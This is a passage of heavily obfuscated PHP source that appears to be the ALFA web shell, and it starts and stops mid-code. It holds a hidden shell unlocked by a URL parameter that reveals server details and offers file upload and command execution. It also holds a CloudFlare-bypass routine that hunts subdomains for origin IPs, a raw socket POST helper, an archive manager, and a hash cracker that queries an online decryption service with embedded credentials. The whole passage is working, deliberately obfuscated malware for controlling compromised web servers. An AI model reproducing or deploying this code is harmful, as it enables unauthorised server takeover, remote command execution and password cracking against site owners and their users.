preg_replace("\x2f\x5e\x28\150\164\x74\x70\163\77\x29\x3a\134\57\x5c\57\x2f", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } if (is_array($server)) { $server = $server[0]; } echo __pre(); if (preg_match("\57\x63\x6c\157\x75\144\x66\x6c\x61\162\x65\57\151", $server)) { echo "\xa\133\53\135\40\103\x6c\x6f\x75\144\x46\154\141\x72\145\x20\144\x65\164\145\x63\x74\145\x64\x3a\x20{$server}\xa\x3c\142\x72\76"; } else { echo "\12\133\x2b\x5d\x20\x43\154\x6f\165\144\x46\x6c\141\x72\145\x20\167\x61\x73\156\x27\164\40\144\x65\164\x65\x63\164\145\144\54\x20\x70\x72\157\143\x65\145\144\x69\156\147\40\x61\156\x79\167\x61\x79\56\12"; } echo "\x5b\x2b\135\40\103\154\157\165\144\106\154\141\162\x65\40\x49\x50\72\x20" . is_ipv4(gethostbyname($url)) . "\12\12\x3c\142\x72\x3e\74\x62\162\x3e"; echo "\133\x2b\x5d\x20\123\x65\x61\162\x63\150\151\x6e\147\x20\146\157\x72\x20\155\x6f\x72\145\x20\x49\120\40\141\x64\x64\x72\x65\163\x73\x65\163\x2e\xa\xa\74\x62\x72\76\x3c\142\162\76"; for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . 
$url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "\x28\116\165\154\154\x29") { continue; } echo "\124\162\171\151\156\147\40{$site}\72\40{$ip}\12\x3c\142\x72\x3e"; } echo "\xa\133\x2b\x5d\40\x46\x69\156\151\163\150\x65\x64\56\12\74\x62\162\x3e"; } echo "\74\57\144\151\x76\76"; alfafooter(); } goto SXwEV; GIU6h: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "\120\117\x53\x54\x20{$uri}\x20\x48\124\x54\120\57\x31\x2e\60\xd\12"; $http .= "\110\157\163\x74\x3a\x20{$server}\15\xa"; $http .= "\125\163\x65\x72\55\101\x67\145\156\x74\72\x20" . $_SERVER["\110\124\124\120\x5f\x55\x53\105\x52\137\101\x47\105\x4e\124"] . "\15\12"; $http .= "\103\157\x6e\x74\x65\156\x74\x2d\124\171\x70\145\x3a\x20\141\160\x70\x6c\151\143\x61\164\151\157\x6e\57\170\55\167\x77\167\55\x66\x6f\x72\x6d\x2d\x75\162\154\145\x6e\x63\157\x64\145\144\15\xa"; $http .= "\103\157\156\164\145\x6e\164\x2d\154\x65\156\147\x74\150\x3a\40" . strlen($post) . "\15\12"; $http .= "\x43\x6f\156\156\145\143\x74\x69\157\156\x3a\40\143\x6c\x6f\163\145\xd\12\xd\12"; $http .= $post . "\15\xa\15\12"; fwrite($socket, $http); $contents = ''; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\xd\12\xd\12", $contents, 2); @fclose($socket); return $body; } else { return ''; } } goto i_y5V; pr1zO: function alfacheckcgi() { if (strlen(alfaEx("\151\x64", false, true, true)) > 0) { echo "\x6f\153"; } else { echo "\x6e\157"; } } goto nWc3X; mG6El: $OVpGNqqFZs = "\x65" . "\166" . 
"\141\x6c"; goto W1P0Y; TMWW9: if (!isset($GLOBALS["\x44\102\137\x4e\x41\x4d\x45"]["\163\x68\x6f\167\137\151\x63\157\156\x73"])) { die("\44\107\x4c\117\102\x41\x4c\123\x5b\47\x44\x42\x5f\x4e\x41\115\105\x27\135\x5b\47\163\150\x6f\x77\137\151\x63\157\156\163\x27\x5d"); } goto uDSKO; VBrHH: function alfaarchive_manager() { alfahead(); $file = $_POST["\141\154\146\141\62"]; if (!file_exists($file)) { $file = $GLOBALS["\143\167\x64"]; } $rand_id = rand(9999, 999999); echo "\x3c\144\x69\x76\40\143\x6c\x61\163\x73\x3d\x68\145\141\144\x65\162\x3e\74\x63\145\x6e\164\145\x72\76\x3c\x70\x3e\x3c\144\151\x76\x20\x63\154\x61\x73\163\x3d\42\164\170\164\x66\x6f\x6e\x74\x5f\x68\145\x61\144\145\162\x22\x3e\174\40\x41\x72\x63\x68\151\166\x65\x20\115\141\156\x61\147\x65\x72\40\x7c\x3c\57\x64\151\166\x3e\x3c\x2f\160\76"; echo "\x3c\x66\157\x72\155\40\x6e\141\x6d\x65\x3d\42\163\162\143\x68\x22\40\x6f\156\x53\x75\142\155\x69\164\75\42\x67\x28\47\141\162\x63\x68\151\x76\145\x5f\155\141\156\141\x67\145\162\x27\x2c\x6e\x75\154\x6c\54\x6e\x75\x6c\x6c\54\x74\150\151\x73\56\x66\151\154\145\x2e\166\x61\154\x75\x65\x2c\x6e\x75\154\x6c\x2c\156\165\x6c\154\x2c\47\76\x3e\x27\51\73\162\145\164\x75\162\x6e\x20\146\141\154\x73\x65\73\x22\x20\x6d\145\164\150\x6f\144\75\47\160\x6f\163\164\x27\x3e\12\11\x3c\144\x69\166\40\x63\154\141\x73\163\75\42\x74\x78\164\x66\x6f\x6e\x74\x22\x3e\12\11\101\x72\143\150\x69\166\145\x20\146\x69\x6c\145\72\x20\x3c\151\156\x70\165\x74\40\163\x69\x7a\145\75\42\65\60\x22\x20\151\x64\x3d\x22\x74\141\162\147\145\164\x22\x20\164\171\x70\x65\75\x22\x74\x65\x78\x74\x22\40\x6e\141\x6d\145\75\42\x66\151\154\145\42\x20\166\141\x6c\x75\x65\x3d\42" . $file . 
"\x22\x3e\xa\x9\74\151\156\160\x75\x74\40\164\171\x70\145\x3d\x22\163\x75\142\155\151\x74\x22\x20\x6e\141\155\145\75\x22\x62\164\156\x22\x20\x76\x61\154\165\x65\x3d\42\x20\x22\x3e\x3c\x2f\x64\x69\x76\76\x3c\57\146\x6f\162\x6d\76\x3c\x2f\x63\x65\156\x74\145\x72\76\x3c\x62\162\x3e"; if ($_POST["\x61\x6c\146\141\x35"] == "\76\x3e") { echo "\x3c\x68\162\x3e\74\x64\151\166\x20\x73\164\x79\154\145\x3d\x22\155\141\x72\x67\151\x6e\55\x6c\145\x66\164\72\x20\x31\x32\x70\x78\x3b\42\40\x61\162\x63\x68\x69\x76\145\137\146\x75\154\x6c\x3d\42\160\150\141\162\x3a\57\57" . $file . "\x22\x20\141\162\x63\150\x69\166\145\137\x6e\141\155\x65\x3d\42" . basename($file) . "\42\x20\151\x64\x3d\42\141\x72\143\150\151\166\145\137\x64\x69\162\x5f" . $rand_id . "\42\40\143\x6c\x61\163\x73\x3d\42\141\x72\143\150\x69\166\145\137\144\x69\162\137\150\157\x6c\x64\x65\x72\x22\x3e\x3c\x73\x70\141\156\76\120\x57\104\72\40\x3c\57\163\x70\x61\156\x3e\74\x64\151\166\x20\x63\x6c\141\x73\x73\x3d\x22\141\162\143\150\x69\166\x65\137\x70\167\x64\x5f\150\157\154\144\145\x72\42\x20\163\164\171\x6c\x65\75\42\x64\x69\163\160\154\x61\x79\72\151\x6e\154\x69\x6e\x65\x2d\x62\x6c\x6f\x63\x6b\42\76\74\x61\x3e\57\74\57\141\x3e\74\x2f\x64\151\x76\76\x3c\57\x64\x69\x76\x3e"; echo "\x3c\144\x69\x76\x20\163\164\171\154\x65\x3d\x22\160\x61\x64\x64\x69\x6e\x67\72\40\61\x30\160\170\x3b\x22\x20\x69\x64\75\x22\x61\162\143\x68\151\x76\x65\x5f\142\x61\x73\145\x5f" . $rand_id . 
"\42\x3e"; __alfa_open_archive_file($file, $rand_id); echo "\x3c\57\x64\151\166\x3e"; } echo "\74\57\144\151\166\76"; alfafooter(); } goto Sp5QA; he7vt: function alfacpcrack() { alfahead(); echo "\74\144\151\166\40\x63\154\x61\x73\x73\x3d\x68\145\141\x64\145\x72\76\74\143\145\156\x74\145\162\x3e\x3c\160\76\74\x64\151\166\x20\x63\x6c\141\x73\x73\75\42\164\170\x74\x66\157\156\x74\x5f\150\145\141\x64\x65\x72\x22\76\174\x20\110\x61\x73\x68\40\124\x6f\x6f\x6c\x73\40\174\74\x2f\x64\x69\x76\x3e\74\57\x70\76\74\x68\x33\x3e\74\x61\40\150\x72\145\x66\x3d\x6a\x61\166\141\163\143\x72\151\x70\164\72\x76\x6f\151\x64\50\60\51\40\157\x6e\143\154\151\143\153\75\x22\x67\x28\x27\143\x70\x63\162\141\x63\153\47\x2c\156\165\154\x6c\54\47\x64\145\x63\47\x29\x22\76\x7c\x20\x44\145\x43\162\x79\x70\x74\x65\162\40\174\x20\74\57\x61\76\74\x61\x20\150\x72\x65\146\75\x6a\141\166\141\x73\143\162\x69\160\164\x3a\166\x6f\151\x64\x28\x30\x29\40\x6f\x6e\143\x6c\151\x63\153\75\42\x67\50\x27\143\160\x63\x72\x61\143\x6b\47\x2c\x6e\165\x6c\154\x2c\x27\x61\x6e\141\154\x79\x7a\145\x72\47\51\42\76\x7c\x20\110\x61\163\150\40\101\156\141\154\x79\172\145\x72\40\174\x20\x3c\57\141\x3e\x3c\x2f\x68\63\x3e\x3c\x2f\143\x65\156\164\145\x72\x3e"; if ($_POST["\x61\154\x66\x61\61"] == "\x64\145\143") { $algorithms = array("\155\x64\x35" => "\115\104\65", "\x6d\144\64" => "\x4d\104\x34", "\x73\150\141\x31" => "\123\110\x41\61", "\163\150\x61\x32\65\66" => "\123\110\101\62\x35\66", "\x73\150\x61\x33\x38\x34" => "\123\110\101\63\70\64", "\163\x68\x61\x35\x31\x32" => "\x53\x48\101\65\x31\62", "\156\x74\x6c\x6d" => "\x4e\124\114\115"); echo 
"\74\x63\x65\156\164\x65\x72\x3e\74\x64\151\x76\40\x63\154\141\x73\163\75\42\164\170\x74\x66\x6f\156\x74\x5f\150\145\141\144\145\162\x22\x3e\x7c\40\104\x65\103\162\x79\x70\164\145\x72\40\x7c\x3c\57\x64\151\166\76\x3c\x62\x72\76\x3c\142\162\x3e\xa\x3c\146\x6f\162\x6d\40\x6f\x6e\x73\165\x62\x6d\151\x74\75\42\147\x28\47\x63\x70\143\x72\141\x63\x6b\47\x2c\156\165\x6c\x6c\x2c\47\x64\x65\x63\x27\x2c\x74\150\x69\x73\56\x6d\144\65\x2e\166\x61\x6c\165\x65\54\47\x3e\x3e\47\54\x74\150\x69\163\x2e\x61\x6c\x67\56\x76\x61\x6c\x75\145\x29\73\40\162\145\164\x75\162\156\x20\x66\141\x6c\x73\x65\73\42\x3e\74\144\x69\x76\40\143\154\141\163\163\x3d\x22\x74\170\x74\146\157\156\x74\x22\76\x44\x65\x63\x72\x79\160\164\x20\115\145\x74\x68\x6f\x64\72\x3c\57\144\x69\x76\76\40\x3c\163\x65\x6c\x65\143\164\x20\156\141\x6d\x65\x3d\x22\x61\x6c\x67\42\x20\163\x74\x79\154\x65\x3d\x22\167\151\144\164\x68\x3a\x31\60\60\x70\x78\x3b\42\x3e"; foreach ($algorithms as $key => $val) { echo "\x3c\x6f\x70\x74\151\157\x6e\x20\x76\x61\x6c\x75\145\75\42" . $key . "\x22\x3e" . $val . 
"\74\57\x6f\x70\x74\x69\x6f\x6e\x3e"; } echo "\x3c\57\163\145\x6c\145\143\x74\x3e\74\151\156\160\165\164\x20\164\171\x70\145\x3d\42\x74\x65\x78\x74\x22\x20\160\x6c\x61\x63\145\x68\157\154\x64\145\162\x3d\x22\110\141\163\x68\42\x20\x6e\x61\x6d\x65\x3d\42\155\x64\x35\42\x20\163\x69\172\x65\x3d\42\66\60\x22\x20\x69\144\x3d\42\164\x65\x78\164\x22\40\x2f\76\40\74\x69\156\160\x75\x74\x20\x74\171\160\145\75\42\x73\165\x62\155\151\164\x22\x20\166\141\154\x75\x65\75\x22\x20\x22\x20\156\x61\x6d\145\75\42\x67\157\x22\40\x2f\x3e\74\x2f\146\x6f\162\155\76\x3c\x2f\x63\145\x6e\x74\x65\x72\76\x3c\x62\x72\76"; if ($_POST["\141\154\146\141\63"] == "\76\76") { $hash = $_POST["\141\154\x66\141\62"]; if (!empty($hash)) { $hash_type = $_POST["\141\154\146\x61\x34"]; $email = "\163\157\154\x65\166\x69\x73\x69\x62\154\x65\x40\147\155\141\x69\x6c\56\x63\157\155"; $code = "\67\x62\71\x66\141\67\x39\x66\71\62\x63\x33\143\144\71\x36"; $target = "\150\x74\x74\x70\163\x3a\57\x2f\x6d\144\x35\144\145\x63\x72\171\x70\x74\x2e\x6e\x65\x74\x2f\x41\160\x69\57\141\x70\x69\x2e\160\150\160\x3f\x68\x61\x73\150\x3d" . $hash . "\x26\150\141\163\150\137\x74\171\x70\145\x3d" . $hash_type . "\46\x65\155\x61\151\x6c\75" . $email . "\x26\143\x6f\144\145\75" . $code; $resp = @file_get_contents($target); if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre() . 
"\x3c\x63\145\x6e\x74\145\162\76"; switch ($resp) { case "\103\x4f\104\x45\40\x45\122\x52\105\x55\x52\x20\x3a\40\60\60\61": echo "\74\x62\76\x3c\146\157\x6e\164\x20\143\157\154\157\162\75\x27\x72\x65\x64\47\76\x59\157\165\x20\x65\170\x63\145\x65\144\x65\144\x20\x74\150\x65\40\64\60\x30\40\141\154\x6c\157\x77\145\144\x20\x72\x65\x71\x75\145\163\164\40\160\145\x72\x20\144\141\x79\x3c\57\146\157\x6e\164\76\74\57\142\76"; break; case "\103\x4f\x44\105\x20\x45\122\122\105\x55\x52\x20\x3a\40\60\x30\x33": echo "\x3c\142\76\74\x66\157\x6e\x74\x20\x63\157\x6c\x6f\x72\75\x27\x72\x65\144\x27\x3e\131\157\165\162\x20\x72\x65\x71\x75\x65\163\x74\40\x69\x6e\143\x6c\165\144\145\x73\x20\x6d\157\162\145\40\164\150\141\x6e\x20\64\x30\60\x20\x68\141\163\x68\x65\163\x2e\74\57\x66\x6f\156\x74\x3e\74\x2f\142\76"; break; case "\103\117\x44\x45\x20\105\122\x52\105\125\122\x20\x3a\x20\x30\x30\64": echo "\74\x62\x3e\74\146\x6f\156\164\40\x63\x6f\154\157\162\x3d\x27\x72\x65\144\x27\76\x54\x68\x65\x20\164\171\x70\145\x20\157\x66\40\x68\141\x73\150\x20\171\x6f\x75\40\160\x72\157\166\151\144\x65\x20\x69\x6e\40\164\x68\x65\40\141\162\147\x75\x6d\145\156\x74\40\150\141\163\x68\x5f\164\171\x70\145\40\144\x6f\145\x73\x6e\x27\164\x20\x73\145\x65\x6d\x20\164\157\x20\142\145\x20\166\x61\154\151\x64\74\57\x66\x6f\156\x74\76\x3c\57\142\76"; break; case "\x43\117\x44\105\x20\x45\x52\x52\x45\125\122\40\72\x20\60\x30\65": echo "\x3c\142\x3e\74\146\x6f\x6e\x74\x20\x63\157\x6c\157\162\75\x27\162\x65\x64\47\x3e\x54\150\x65\40\150\x61\x73\150\x20\171\157\165\x20\160\162\157\166\151\144\x65\40\x64\157\x65\163\x6e\x27\x74\x20\163\x65\145\155\40\164\x6f\x20\155\141\x74\x63\x68\x20\x77\151\164\150\40\x74\150\145\x20\164\x79\160\x65\40\157\x66\x20\x68\141\163\150\x20\x79\x6f\165\40\x73\145\164\56\x3c\57\x66\x6f\156\164\76\74\57\x62\x3e"; break; } if (substr($resp, 0, 4) != "\x43\x4f\104\x45" && $resp != '') { echo 
"\74\142\x3e\122\145\163\165\x6c\x74\x3a\x20\74\146\x6f\x6e\164\40\x63\157\154\157\x72\75\x27\147\162\x65\145\x6e\x27\76" . $resp . "\x3c\x2f\146\157\x6e\164\76\x3c\x2f\x62\x3e"; } elseif (substr($resp, 0, 4) != "\103\x4f\104\x45") { echo "\74\x66\x6f\x6e\x74\40\143\x6f\154\157\x72\75\x27\x72\145\144\47\x3e\116\x6f\124\40\106\x6f\165\156\x64\x3c\57\x66\x6f\156\x74\x3e\x3c\x62\x72\40\57\x3e"; } echo "\x3c\57\x63\x65\156\x74\145\x72\76"; } } } if ($_POST["\141\154\x66\x61\x31"] == "\141\x6e\141\x6c\x79\x7a\x65\x72") { echo "\74\x63\145\x6e\164\145\162\x3e\74\x70\76\x3c\x64\151\166\x20\143\x6c\141\163\163\x3d\x22\x74\x78\164\146\x6f\x6e\x74\137\x68\145\141\144\145\162\42\x3e\174\40\x48\141\163\150\40\101\156\141\154\x79\x7a\x65\162\40\x7c\74\57\x64\x69\x76\x3e\x3c\57\160\76\xa\74\x66\x6f\x72\155\x20\x6f\156\163\165\x62\155\151\x74\75\42\x67\x28\47\143\x70\143\162\141\x63\153\47\x2c\x6e\165\154\x6c\x2c\x27\141\156\x61\154\x79\172\145\x72\x27\x2c\x74\150\x69\163\x2e\150\141\x73\150\56\x76\141\154\x75\145\x2c\47\76\76\x27\51\73\x72\x65\x74\x75\x72\x6e\x20\146\141\154\163\x65\x3b\x22\x3e\xa\x3c\x64\x69\x76\40\143\154\141\x73\163\x3d\x22\x74\x78\x74\146\x6f\156\164\42\x3e\110\141\x73\150\72\x20\74\57\x64\x69\166\76\40\74\x69\x6e\x70\165\x74\40\x74\x79\x70\x65\75\42\x74\145\x78\x74\x22\40\160\x6c\x61\x63\145\150\x6f\154\144\145\x72\x3d\42\x48\141\163\x68\x22\40\156\x61\155\x65\75\42\150\x61\x73\150\42\x20\163\x69\172\145\75\42\x36\x30\42\x20\151\x64\x3d\x22\164\145\x78\164\42\x20\x2f\76\x20\x3c\x69\x6e\x70\x75\164\x20\164\171\160\x65\x3d\x22\163\x75\x62\x6d\x69\x74\42\40\x76\x61\x6c\165\145\75\42\40\42\40\156\141\155\145\75\42\147\157\x22\x20\x2f\x3e\x3c\x2f\146\157\x72\155\x3e\74\57\x63\x65\x6e\164\x65\x72\x3e\x3c\142\x72\76"; if ($_POST["\x61\154\x66\141\x33"] == "\76\x3e") { $hash = $_POST["\x61\154\146\x61\x32"]; if (!empty($hash)) { $curl = new AlfaCURL(); $resp = 
$curl->Send("\150\164\164\160\x73\x3a\x2f\x2f\155\144\65\x64\145\143\162\x79\x70\x74\56\156\145\164\57\145\156\57\110\141\x73\x68\x46\151\156\144\145\162\x2f", "\160\x6f\x73\x74", "\150\x61\163\150\x3d{$hash}\46\x63\162\171\160\164\x3d\x53\x65\141\x72\143\150"); echo __pre() . "\74\x63\145\156\164\145\x72\x3e"; if (preg_match("\x23\x3c\146\x69\145\x6c\144\163\145\164\x20\143\x6c\141\163\x73\x3d\42\x74\x72\157\165\166\145\x22\76\x28\56\52\77\51\x3c\x2f\146\151\x65\154\144\x73\x65\164\76\x23", $resp, $s)) { echo "\74\146\157\156\x74\40\x63\157\x6c\x6f\162\75\x22\x67\162\145\x65\x6e\x22\x3e" . $s[1] . "\74\57\x66\157\x6e\x74\76"; } else { echo "\x3c\146\157\x6e\164\x20\143\157\x6c\157\162\x3d\x22\x72\x65\x64\x22\76\x4e\157\164\40\x46\x6f\165\x6e\144\x2e\x2e\x2e\x21\74\57\x66\157\x6e\164\x3e"; } echo "\x3c\57\143\x65\156\164\x65\x72\76\x3c\x62\162\76"; } } } echo "\x3c\x2f\x64\x69\166\x3e"; alfafooter(); } goto BhkkX; i_y5V: if (isset($_GET["\163\157\154\145\x76\x69\163\151\142\154\x65"])) { @error_reporting(E_ALL ^ E_NOTICE); echo "\74\150\x74\155\154\76"; echo "\74\164\x69\x74\x6c\x65\76\123\157\154\145\x76\x69\x73\x69\x62\154\x65\40\110\151\x64\x64\x65\x6e\40\x53\150\145\x6c\x6c\74\x2f\x74\x69\164\x6c\145\x3e"; echo "\x3c\142\157\144\x79\x20\x62\x67\x63\x6f\154\x6f\x72\75\43\60\60\60\x30\x30\x30\76"; echo "\74\142\76\74\x62\x69\147\76\x3c\146\x6f\156\x74\40\x63\x6f\x6c\x6f\x72\75\x23\x37\x43\x46\x43\60\x30\76\x4b\145\162\156\x65\154\x20\72\x20\x3c\x2f\x66\x6f\x6e\164\x3e\74\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\162\75\x22\x23\106\x46\x46\x46\x46\x22\76" . (function_exists("\x70\x68\x70\137\165\156\x61\x6d\x65") ? php_uname() : "\77\x3f\x3f") . 
"\74\57\x66\157\156\164\76\x3c\57\142\76\74\57\142\x69\147\x3e"; $safe_mode = @ini_get("\163\141\146\x65\137\155\x6f\x64\145"); if ($safe_mode) { $r = "\x3c\x62\40\163\164\x79\154\145\75\x27\x63\x6f\154\157\x72\x3a\x20\x72\145\x64\47\x3e\x4f\156\74\x2f\142\76"; } else { $r = "\74\x62\40\x73\164\171\x6c\x65\x3d\x27\143\x6f\154\x6f\162\72\x20\x67\162\145\145\x6e\x27\76\117\x66\146\x3c\x2f\x62\76"; } echo "\x3c\142\162\x3e\74\142\40\163\164\x79\x6c\145\x3d\47\x63\x6f\x6c\157\x72\x3a\40\43\67\103\106\103\60\x30\x27\x3e\117\x53\x3a\x20\x3c\57\x66\157\x6e\x74\x3e\x3c\x66\157\156\164\x20\143\157\x6c\157\x72\x3d\167\x68\151\x74\x65\x3e" . PHP_OS . "\x3c\57\146\x6f\156\164\76\74\x62\x72\x3e"; echo "\74\142\40\163\164\171\154\x65\x3d\x27\143\x6f\x6c\x6f\x72\72\x20\43\x37\103\x46\x43\60\60\x27\x3e\123\157\x66\164\167\x61\162\145\72\40\x3c\x2f\146\x6f\156\x74\x3e\x3c\146\157\156\x74\x20\x63\157\x6c\x6f\162\x3d\x77\x68\x69\x74\x65\76" . $_SERVER["\x53\x45\x52\x56\105\122\x5f\x53\x4f\x46\x54\x57\101\122\x45"] . "\x3c\x2f\146\157\x6e\164\76\74\x62\x72\76"; echo "\120\110\120\40\126\145\x72\x73\x69\x6f\156\x3a\40\x3c\146\x6f\x6e\x74\40\143\157\154\157\x72\x3d\167\x68\151\x74\145\x3e" . PHP_VERSION . "\x3c\57\x66\x6f\x6e\164\76\74\142\162\40\57\x3e"; echo "\120\127\104\x3a\74\x66\x6f\156\164\40\x63\157\154\x6f\x72\75\43\106\106\106\x46\x46\x46\76\40" . str_replace("\x5c", "\x2f", @alfaGetCwd()) . 
"\57\x3c\x62\x72\40\57\76"; echo "\x3c\x62\40\x73\164\x79\x6c\x65\x3d\47\x63\x6f\x6c\157\x72\x3a\40\x23\x37\x43\x46\103\60\x30\x27\x3e\123\x61\146\145\x20\x4d\x6f\x64\145\x20\x3a\40{$r}\74\142\162\x3e"; echo "\x3c\146\x6f\156\x74\x20\143\157\x6c\157\162\x3d\x23\67\x43\106\x43\x30\x30\76\104\x69\163\141\x62\x6c\145\40\146\x75\x6e\x63\x74\x69\157\156\x73\x20\x3a\x20\74\x2f\x66\x6f\156\164\x3e"; $disfun = @ini_get("\144\x69\163\141\142\154\x65\137\x66\165\156\x63\164\151\157\x6e\163"); if (empty($disfun)) { $disfun = "\74\146\x6f\x6e\164\40\143\x6f\x6c\x6f\162\x3d\42\x67\162\x65\145\156\x22\x3e\x4e\x4f\x4e\x45\x3c\x2f\x66\157\156\x74\76"; } echo "\74\x66\157\x6e\x74\40\x63\x6f\154\x6f\x72\75\162\x65\144\76"; echo "{$disfun}"; echo "\74\x2f\x66\157\x6e\x74\x3e\x3c\x62\162\76"; echo "\x3c\x62\40\x73\164\171\x6c\145\75\47\x63\x6f\154\x6f\162\72\40\43\67\103\106\x43\60\60\47\x3e\131\157\165\162\x20\111\x70\x20\101\x64\144\x72\x65\x73\163\x20\x69\x73\40\x3a\x20\x20\x3c\57\x66\x6f\x6e\164\x3e\74\146\157\156\164\x20\x63\157\154\157\x72\x3d\167\x68\151\x74\x65\x3e" . $_SERVER["\x52\x45\115\117\x54\x45\137\101\104\x44\122"] . "\74\57\x66\157\156\x74\76\x3c\x62\162\76"; echo "\x3c\x62\x20\x73\x74\171\x6c\x65\x3d\x27\143\157\154\x6f\162\72\40\43\67\x43\x46\103\x30\60\47\76\x53\145\x72\x76\x65\162\x20\x49\160\40\x41\144\x64\162\x65\163\163\40\x69\x73\40\72\40\x20\x3c\x2f\x66\157\156\164\x3e\74\x66\x6f\156\164\x20\x63\x6f\x6c\157\162\75\x77\x68\151\x74\x65\x3e" . (function_exists("\x67\x65\x74\x68\157\163\x74\x62\171\x6e\x61\x6d\x65") ? @gethostbyname($_SERVER["\x48\124\124\120\x5f\110\x4f\x53\124"]) : "\x3f\x3f\77") . 
"\74\x2f\146\x6f\156\164\76\x3c\x62\x72\x3e\74\x70\x3e"; echo "\x3c\x68\162\76\74\x63\145\156\x74\x65\x72\76\x3c\146\x6f\x72\x6d\40\x6f\156\123\165\142\155\151\164\75\42\x74\150\151\x73\56\x75\x70\154\x6f\141\x64\x2e\144\151\163\141\142\x6c\145\x64\x3d\164\162\x75\145\73\x74\x68\151\x73\56\x63\x77\144\56\166\x61\x6c\x75\145\40\x3d\40\142\164\157\141\50\x75\x6e\x65\x73\143\x61\160\x65\50\145\156\143\x6f\x64\x65\x55\122\x49\x43\x6f\x6d\160\157\156\x65\156\x74\50\164\150\x69\163\56\143\x77\144\56\166\x61\154\165\145\x29\x29\51\x3b\x22\40\141\x63\164\151\x6f\156\x3d\42\x22\x20\155\x65\x74\x68\157\144\75\42\160\x6f\163\x74\42\x20\145\x6e\x63\164\171\x70\145\x3d\x22\x6d\165\154\x74\x69\x70\141\162\164\57\x66\x6f\x72\x6d\x2d\144\141\x74\x61\42\40\x6e\x61\155\145\75\x22\165\x70\154\x6f\141\144\145\x72\42\40\x69\x64\x3d\x22\165\x70\x6c\x6f\141\144\145\162\42\76"; echo "\103\127\x44\x3a\x20\x3c\x69\156\160\x75\164\40\164\171\x70\145\x3d\x22\164\x65\x78\164\x22\40\156\141\x6d\145\75\42\143\x77\x64\42\40\x76\x61\x6c\165\x65\75\x22" . str_replace("\134", "\x2f", @alfaGetCwd()) . "\57\42\x20\x73\151\x7a\145\x3d\42\x35\x39\42\76\x3c\x70\x3e\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\75\x22\x66\151\x6c\x65\42\40\x6e\141\155\145\x3d\x22\x66\x69\x6c\145\x22\x20\x73\x69\x7a\x65\75\42\x34\65\42\x3e\x3c\151\x6e\160\165\164\40\x6e\141\155\145\75\42\165\160\x6c\157\141\144\x22\40\164\x79\x70\145\x3d\42\x73\165\x62\155\x69\164\x22\x20\x69\x64\75\x22\x5f\165\160\x6c\42\40\x76\141\x6c\165\145\x3d\x22\125\160\x6c\157\141\x64\42\76\74\x2f\x70\x3e\x3c\57\x66\157\x72\x6d\x3e\74\x2f\143\145\156\164\145\162\76"; if (isset($_FILES["\146\151\x6c\x65"])) { if (@move_uploaded_file($_FILES["\x66\151\154\145"]["\164\155\x70\137\156\141\155\x65"], __ZGVjb2Rlcg(@$_POST["\x63\167\144"]) . "\x2f" . 
$_FILES["\146\x69\x6c\x65"]["\156\141\x6d\x65"])) { echo "\x3c\x62\x3e\x3c\146\157\x6e\x74\40\143\157\154\x6f\162\x3d\42\43\67\103\x46\x43\60\60\42\76\74\x63\145\x6e\164\x65\162\76\125\160\154\157\x61\x64\x20\123\x75\x63\143\145\163\163\146\165\x6c\x6c\171\40\73\51\x3c\57\146\x6f\x6e\x74\76\74\x2f\x61\76\74\x66\157\156\x74\40\143\x6f\x6c\x6f\x72\75\42\43\x37\x43\106\x43\x30\60\42\76\x3c\x2f\142\76\x3c\x62\x72\76\x3c\142\x72\76\74\57\x63\x65\x6e\164\x65\162\x3e"; } else { echo "\x3c\x63\x65\x6e\164\x65\162\76\74\x62\x3e\x3c\x66\157\x6e\x74\40\143\157\154\x6f\x72\75\x22\43\x37\103\x46\x43\60\60\42\76\125\x70\154\x6f\x61\x64\x20\x66\x61\x69\154\145\x64\x20\x3a\50\x3c\x2f\146\x6f\x6e\164\76\x3c\x2f\141\x3e\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\x22\43\67\103\106\103\60\42\x3e\74\57\x62\76\74\57\x63\x65\x6e\x74\145\x72\76\x3c\142\x72\x3e\74\142\x72\x3e"; } } echo "\74\x68\x72\x3e\x3c\146\157\x72\x6d\40\x6f\x6e\x53\165\142\155\151\x74\75\42\164\150\151\163\56\145\170\145\143\x75\x74\145\x2e\x64\x69\x73\x61\142\x6c\145\144\75\x74\162\165\145\73\164\x68\151\163\x2e\143\157\x6d\x6d\141\x6e\x64\x5f\x73\157\x6c\145\166\x69\x73\151\x62\x6c\145\x2e\166\141\154\x75\x65\x20\75\40\x62\x74\157\x61\50\x75\156\x65\163\x63\x61\x70\x65\x28\145\x6e\x63\x6f\x64\x65\125\x52\111\103\x6f\x6d\x70\x6f\x6e\x65\x6e\164\x28\x74\150\x69\x73\56\x63\x6f\x6d\x6d\141\156\x64\137\163\157\154\145\166\151\x73\x69\142\154\145\x2e\x76\x61\x6c\165\x65\51\x29\x29\73\x22\40\x6d\145\x74\x68\x6f\144\x3d\42\120\117\123\x54\42\76\105\170\145\143\165\x74\x65\40\103\157\x6d\155\x61\156\144\x3a\x20\x3c\151\x6e\160\x75\x74\x20\156\x61\x6d\145\x3d\42\x63\x6f\155\155\141\x6e\x64\x5f\163\x6f\154\145\166\151\163\151\x62\x6c\145\x22\40\166\x61\154\x75\x65\x3d\x22\42\40\x73\x69\172\145\x3d\x22\x35\71\42\x20\164\x79\160\145\x3d\42\164\x65\170\x74\x22\40\x61\x6c\151\147\156\75\42\154\x65\146\x74\42\x20\x3e\74\151\156\160\x75\164\40\x6e\x61\x6d\145\75\42\x65\170\145\x63\165\164\x65\42\x20\166\141\x6c\165\x65\x3d\x22\
